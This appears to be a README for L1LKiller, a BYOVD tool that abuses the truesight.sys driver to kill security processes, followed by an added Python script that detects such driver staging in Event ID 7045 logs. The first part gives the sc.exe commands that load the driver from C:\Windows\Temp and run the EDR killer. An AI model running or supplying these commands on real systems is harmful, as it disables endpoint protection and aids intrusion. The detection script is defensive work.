L1LKiller is a tool developed to exploit the truesight.sys driver of the Rogue Anti-Malware Driver 3.3 software through the BYOVD (Bring Your Own Vulnerable Driver) technique. About a year ago this vulnerability was fixed, and the driver is currently listed in LOLDrivers (Living Off The Land Drivers). I developed this project at the time the discovery of this driver was released, and I was able to successfully perform the test on Sophos EDR. Since there is already a mitigation, I decided to publish this project, which I had kept private for a while.
Demo video: output.mp4
```
__ _____ __ __ _ ____
/ / < / / / //_/(_) / /__ _____
/ / / / / / ,< / / / / _ \/ ___/
/ /___/ / /___/ /| |/ / / / __/ /
/_____/_/_____/_/ |_/_/_/_/\___/_/
[Coded by Brosck]
[v1.0]

Usage: C:\Windows\Temp\L1LKiller\L1LKiller.exe [OPTIONS]

Options:
  single, kill processes only once
  loop,   kill processes in a loop

Examples:
  L1LKiller.exe single
  L1LKiller.exe loop
```
In cmd.exe as administrator:
```
sc create l1lkiller binPath="C:\Windows\Temp\L1LKiller\L1LKiller.sys" type=kernel
sc start l1lkiller
L1LKiller.exe single
```
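For defenders, the steps above leave a distinctive trace: a new kernel-mode driver service whose image sits in a user-writable directory such as C:\Windows\Temp, installed through the Service Control Manager, which Windows records in the System log as Event ID 7045 ("A service was installed in the system"). The following is an added example, not part of the L1LKiller project, that scans such records for that pattern and for driver file names already listed in LOLDrivers (truesight.sys, as the page states). The event records are constructed samples; the suspicious-directory list and the known-vulnerable-driver set are assumptions to be tuned per environment.

```python
import re
from dataclasses import dataclass

# Constructed sample records shaped like Windows System-log Event ID 7045 entries
# (fields as Get-WinEvent renders them). These are made-up examples, not real log data.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "l1lkiller",
     "ImagePath": r"C:\Windows\Temp\L1LKiller\L1LKiller.sys",
     "ServiceType": "kernel mode driver", "StartType": "demand start"},
    {"EventID": 7045, "ServiceName": "TrueSight",
     "ImagePath": r"\??\C:\Users\Public\truesight.sys",
     "ServiceType": "kernel mode driver", "StartType": "demand start"},
    {"EventID": 7045, "ServiceName": "Spooler2",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe",
     "ServiceType": "user mode service", "StartType": "auto start"},
    {"EventID": 7045, "ServiceName": "vgk",
     "ImagePath": r"C:\Windows\System32\drivers\vgk.sys",
     "ServiceType": "kernel mode driver", "StartType": "demand start"},
]

# Driver file names the page identifies as vulnerable (truesight.sys is in LOLDrivers).
# Assumption: in practice this set would be populated from the LOLDrivers feed.
KNOWN_VULNERABLE_DRIVERS = {"truesight.sys"}

# Directories a legitimately installed kernel driver normally never lives in.
# Assumption: tune this list for your environment.
SUSPICIOUS_DIR_PATTERNS = [
    re.compile(r"^[a-z]:\\windows\\temp\\", re.I),
    re.compile(r"^[a-z]:\\users\\", re.I),
    re.compile(r"^[a-z]:\\programdata\\", re.I),
    re.compile(r"^[a-z]:\\temp\\", re.I),
]


@dataclass
class Finding:
    service_name: str
    image_path: str
    reasons: list


def normalize_image_path(image_path: str) -> str:
    """Strip quotes and the NT-style \\??\\ prefix that driver image paths often carry."""
    p = image_path.strip().strip('"')
    if p.lower().startswith("\\??\\"):
        p = p[4:]
    return p


def analyze_event(evt: dict):
    """Return a Finding if a 7045 record looks like BYOVD driver staging, else None."""
    if evt.get("EventID") != 7045:
        return None
    # Only kernel-mode driver services matter here; user-mode services are out of scope.
    if "kernel" not in evt.get("ServiceType", "").lower():
        return None
    path = normalize_image_path(evt["ImagePath"])
    reasons = []
    if any(pat.match(path) for pat in SUSPICIOUS_DIR_PATTERNS):
        reasons.append("kernel driver image in user-writable directory")
    basename = path.rsplit("\\", 1)[-1].lower()
    if basename in KNOWN_VULNERABLE_DRIVERS:
        reasons.append(f"driver file name matches known-vulnerable driver: {basename}")
    if not reasons:
        return None
    return Finding(evt["ServiceName"], path, reasons)


def scan(events):
    """Run analyze_event over a sequence of records and collect the findings."""
    return [f for f in (analyze_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[!] service={f.service_name} image={f.image_path}")
        for r in f.reasons:
            print(f"      - {r}")
```

In a live environment the records would come from the System log (for example via PowerShell's Get-WinEvent filtered on Id 7045) rather than the embedded samples; the two checks are deliberately independent so that a renamed driver copied into Temp is still caught by the path rule, and a vulnerable driver dropped into a normal-looking directory is still caught by the name rule.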